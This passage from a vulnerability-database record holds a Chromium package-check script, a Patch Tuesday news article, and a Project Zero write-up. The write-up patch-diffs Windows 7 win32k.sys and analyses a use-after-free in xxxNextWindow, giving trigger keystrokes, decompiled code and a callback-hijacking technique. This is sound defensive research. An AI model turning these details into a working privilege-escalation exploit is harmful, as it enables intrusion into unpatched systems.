ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-sandbox\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2019-11-15T18:21:02", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1457"], "description": "**Microsoft** today released updates to plug security holes in its software, including patches to fix at least 74 weaknesses in various flavors of **Windows** and programs that run on top of it. The November updates include patches for a zero-day flaw in **Internet Explorer** that is currently being exploited in the wild, as well as a sneaky bug in certain versions of **Office for Mac** that bypasses security protections and was detailed publicly prior to today's patches.\n\nMore than a dozen of the flaws tackled in this month's release are rated \"critical,\" meaning they involve weaknesses that could be exploited to install malware without any action on the part of the user, except for perhaps browsing to a hacked or malicious Web site or opening a booby-trapped file attachment.\n\nPerhaps the most concerning of those critical holes is a zero-day flaw in Internet ~~Exploder~~ Explorer ([CVE-2019-1429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>)) that has already seen active exploitation. Today's updates also address two other critical vulnerabilities in the same Windows component that handles various [scripting languages](<https://encyclopedia2.thefreedictionary.com/Microsoft+Script+Engine>).\n\nMicrosoft also fixed a flaw in Microsoft Office for Mac ([CVE-2019-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1457>)) that could allow attackers to bypass security protections in some versions of the program.\n\nMacros are bits of computer code that can be embedded into Office files, and malicious macros are frequently used by malware purveyors to compromise Windows systems. Usually, this takes the form of a prompt urging the user to \"enable macros\" once they've opened a booby-trapped Office document delivered via email. Thus, Office has a feature called \"disable all macros without notification.\"\n\n\n\nBut Microsoft says all versions of Office still support an older type of macros that do not respect this setting, and can be used as [a vector for pushing malware](<https://krebsonsecurity.com/2019/02/payroll-provider-gives-extortionists-a-payday/>). **Will Dormann** of the [CERT/CC has reported](<https://kb.cert.org/vuls/id/125336/>) that Office 2016 and 2019 for Mac will fail to prompt the user before executing these older macro types if the \"Disable all macros without notification\" setting is used.\n\nOther Windows applications or components receiving patches for critical flaws today include Microsoft Exchange and Windows Media Player. In addition, Microsoft also patched nine vulnerabilities -- five of them critical -- in the **Windows Hyper-V**, an add-on to the **Windows Server OS** (and **Windows 10 Pro**) that allows users to create and run [virtual machines](<https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/>) (other \"guest\" operating systems) from within Windows.\n\nAlthough **Adobe** typically issues patches for its **Flash Player** browser component on Patch Tuesday, this is the second month in a row that Adobe has not released any security updates for Flash. However, Adobe today did push security fixes for a variety of its creative software suites, including [Animate](<https://helpx.adobe.com/security/products/animate/apsb19-34.html>), [Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb19-36.html>), [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb19-52.html>) and [Bridge](<https://helpx.adobe.com/security/products/bridge/apsb19-53.html>). Also, I neglected to note last month that Adobe released a critical update for **Acrobat/Reader** that [addressed at least 67 bugs](<https://helpx.adobe.com/security/products/acrobat/apsb19-49.html>), so if you've got either of these products installed, please be sure they're patched and up to date.\n\nFinally, **Google** recently fixed a zero-day flaw in its **Chrome** Web browser ([CVE-2019-13720](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)). If you use Chrome and see an upward-facing arrow to the right of the address bar, you have an update pending; fully closing and restarting the browser should install any available updates.\n\nNow seems like a good time to remind all you **Windows 7** end users that Microsoft will cease shipping security updates after January 2020 (this end-of-life also affects Windows Server 2008 and 2008 R2). While businesses and other volume-license purchasers will [have the option to pay for further fixes](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) after that point, all other Windows 7 users who want to stick with Windows will need to consider migrating to **Windows 10** soon.\n\nStandard heads-up: Windows 10 likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, [but it is possible](<https://www.howtogeek.com/224471/how-to-prevent-windows-10-from-automatically-downloading-updates/>). For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update. To get there, click the Windows key on your keyboard and type \u201cwindows update\u201d into the box that pops up.\n\nKeep in mind that while staying up-to-date on Windows patches is a good idea, it's important to make sure you're updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re probably not freaking out when the odd buggy patch causes problems booting the system. So do yourself a favor and backup your files before installing any patches.\n\nAs ever, if you experience glitches or problems installing any of these patches this month, please feel free to leave a comment about it below; there\u2019s a decent chance other readers have experienced the same and may even chime in here with some helpful tips.\n\n**Update, Nov. 13, 11:34 a.m.:** An earlier version of this story misstated some of the findings from CERT/CC, and misspelled the name of the researcher. The above post has been corrected.", "modified": "2019-11-12T22:04:32", "published": "2019-11-12T22:04:32", "id": "KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB", "href": "https://krebsonsecurity.com/2019/11/patch-tuesday-november-2019-edition/", "type": "krebs", "title": "Patch Tuesday, November 2019 Edition", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). \n\n** \n**\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\n** \n**\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\n** \n**\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\n** \n**\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\n** \n**\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\n** \n**\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\n** \n**\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\n** \n**\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\n** \n**\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\n** \n**\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\n** \n**\n\nOn James Foreshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\n** \n**\n\nNow that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\n** \n**\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n \n\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\n \n\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\n** \n**\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\n \n\n\nBinDiff Matched Function of win32k.sys with Symbols\n\n** \n**\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n** \n**\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\n** \n**\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\n** \n**\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.\n\n** \n**\n\nI decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\n \n\n\n** \n**\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\n** \n**\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\n** \n**\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\n** \n**\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n** \n**\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\n** \n**\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n** \n**\n\n## REVERSING THE VULNERABILITY\n\nI had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn\u2019t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.\n\n** \n**\n\nFor example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground \u2192 global, pointer to queue (tagQ *), gptiCurrent \u2192 global, pointer to thread info (tagTHREADINFO *).\n\n** \n**\n\nThis was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it\u2019s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.\n\n** \n**\n\nAt this point, I was pretty sure I had found the vulnerability (\ud83d\ude09), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.\n\n## RESOURCES\n\nHere are some of the resources that were critical for me:\n\n * \u201cKernel Attacks Through User- Mode Callbacks\u201d Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]\n\n * I learned about thread locking, assignment locking, and user-mode callbacks.\n\n * \u201cOne Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild\u201d by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]\n\n * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.\n\n * \u201cKernel exploitation \u2013 r0 to r3 transitions via KeUserModeCallback\u201d by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]\n\n * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.\n\n * \u201cWindows Kernel Reference Count Vulnerabilities - Case Study\u201d by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]\n\n * \u201cAnalyzing local privilege escalations in win32k\u201d by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]\n\n * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes\n\n# TIMELINE\n\n * Oct 31 2019: Chrome releases fix for CVE-2019-13720\n\n * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. \n\n * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!\n\n * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)\n\n * Dec 23 2019: VM is set-up. Start patch diffing\n\n * Dec 24-Jan 2: Holiday\n\n * Jan 2 - Jan 3: Look at other diffs that weren\u2019t the vulnerability. Try to trigger DrawSwitchWndHilite\n\n * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the \u201ccorrect change\u201d.)\n\n * Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.\n\n * Jan 16: Crash POC crashes!\n\n** \n**\n\nApproximately 3 work weeks to set up a test environment, diff patches, and create crash POC. \n\n# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS\n\nBug class: use-after-free\n\n** \n**\n\n## OVERVIEW\n\nThe vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free.\n\n## DETAILED WALK THROUGH\n\nThis section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).\n\n### ANALYZED SAMPLES\n\nI did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the \u201cMy Process\u201d section.\n\n** \n**\n\nVulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)\n\nPatched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)\n\n** \n**\n\n### OVERVIEW\n\nThis walk through is broken up into the following sections to describe the vulnerability:\n\n * Triggering xxxNextWindow\n\n * Freeing the tagQ (queue) structure\n\n * User-mode callback xxxMoveSwitchWndHilite\n\n * Using the freed queue\n\n### TRIGGERING xxxNextWindow\n\nThe code path is triggered by a special set of keyboard inputs to open a \u201cSticky Task Switcher\u201d window. As a side note, I didn\u2019t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: \n\n\n<ALT (Extended)> \\+ TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). \n\n** \n**\n\nThe \u201cnormal\u201d way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for \u201csticky\u201d. However, this window won\u2019t hit the vulnerable code path, xxxNextWindow. The \u201cnormal\u201d task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the \u201cnormal\u201d task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. \n \n \n\n\n[](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n \n\n\n\"Normal\" task switch window\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n\n\nWindow that is displayed when xxxNextWindow is called\n\n \nIf this is the first \u201ctab press\u201d then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. \n\n** \n**\n\n### FREEING THE QUEUE in xxxNextWindow\n\nxxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. \n\n** \n**\n\nAt LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. \n\n** \n**\n\nvoid __fastcall xxxNextWindow(tagQ *queue, int a2) {\n\n[...]\n\n \n\n\nV43 = 0;\n\nwhile ( 1 ) {\n\nif (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&\n\ngspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n\ngspwndAltTab->bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64;\n\nif ( !v45 ) {\n\nThreadUnlock1();\n\ngoto LABEL_106;\n\n}\n\nhandleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); \u2190 USER MODE CALLBACK\n\nif ( v43 )\n\n{\n\nif ( v43 == handleOfNextWindowToHilite ) {\n\nv48 = 0i64;\n\nLABEL_103:\n\nThreadUnlock1();\n\nHMAssignmentLock(&gspwndActivate, v48);\n\nif ( !*(_QWORD *)&gspwndActivate )\n\nxxxCancelCoolSwitch();\n\nreturn;\n\n}\n\n} else { v43 = handleOfNextWindowToHilite; }\n\ntagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);\n\nif ( tagWndPtrOfNextWindow )\n\ngoto LABEL_103;\n\nisShiftPressed2 = isShiftPressed;\n\n}\n\n \n\n\n[...]\n\n \n\n\nLABEL_106:\n\nv11 = queue->spwndActive; \u2190 USE AFTER FREE\n\nif ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {\n\n \n\n\n[...] \n \n--- \n \n** \n**\n\n#### USER-MODE CALLBACK in xxxMoveSwitchWndHilite\n\nThere are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.\n\n** \n**\n\nThis call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.\n\n** \n**\n\nxxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it\u2019s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>). \n\n** \n**\n\nIn the callback, we free the 